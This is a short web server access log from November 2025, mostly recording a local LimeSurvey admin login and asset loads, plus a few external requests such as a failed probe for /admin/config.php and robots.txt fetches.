78.135.107.199 - - [08/Nov/2025:15:44:47 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
3.146.107.169 - - [08/Nov/2025:15:52:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:15:52:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
78.135.107.199 - - [08/Nov/2025:15:53:21 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
78.135.107.199 - - [08/Nov/2025:15:53:21 +0300] "GET /robots.txt HTTP/1.1" 404 299
::1 - - [08/Nov/2025:15:58:08 +0300] "POST /limesurvey/index.php/admin/authentication/sa/login HTTP/1.1" 302 -
::1 - - [08/Nov/2025:15:58:08 +0300] "GET /limesurvey/index.php/admin/index HTTP/1.1" 302 -
::1 - - [08/Nov/2025:15:58:09 +0300] "GET /limesurvey/index.php/dashboard/view HTTP/1.1" 200 97559
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.css HTTP/1.1" 200 32146
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/fe219f6b/css/font-awesome.min.css HTTP/1.1" 200 31000
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/c079016d/select2-bootstrap-5-theme.min.css HTTP/1.1" 200 31223
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/d03c6e50/remixicon.css HTTP/1.1" 200 120156
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/65545126/roboto.css HTTP/1.1" 200 9693
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/b6d5324e/css/select2.min.css HTTP/1.1" 200 16264
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/65545126/icomoon.css HTTP/1.1" 200 8905
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/f41f3686/build/lstutorial.css HTTP/1.1" 200 618
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/css/adminsidepanel.css HTTP/1.1" 200 12617
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/beee38c9/pager.css HTTP/1.1" 200 880
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/33d0fe64/style.css HTTP/1.1" 200 495
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/b22a13aa/ibm-sans.css HTTP/1.1" 200 2463
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/c2b84cea/css/sea_green.css HTTP/1.1" 200 420829
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/1dc39fff/ibm-serif.css HTTP/1.1" 200 2345
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/719a6b3e/jquery.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/tempus-dominus.min.css HTTP/1.1" 200 48393
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/82c8145e/jquery-ui.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/59c9629e/jquery-migrate.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/cca8c333/moment-with-locales.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/cd4cd59b/build.min/js/adminsidepanel.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/build/popper-tempus.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/5705645f/js.cookie.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/7c8ce1eb/datepickerInit.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/f56677d0/build/lslog.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/bc17442/min/pjax.combined.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/b6d5324e/js/select2.full.min.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/ckeditor.js HTTP/1.1" 304 -
::1 - - [08/Nov/2025:15:58:10 +0300] "GET /limesurvey/tmp/assets/9f17b2e2/config.js HTTP/1.1" 304 -
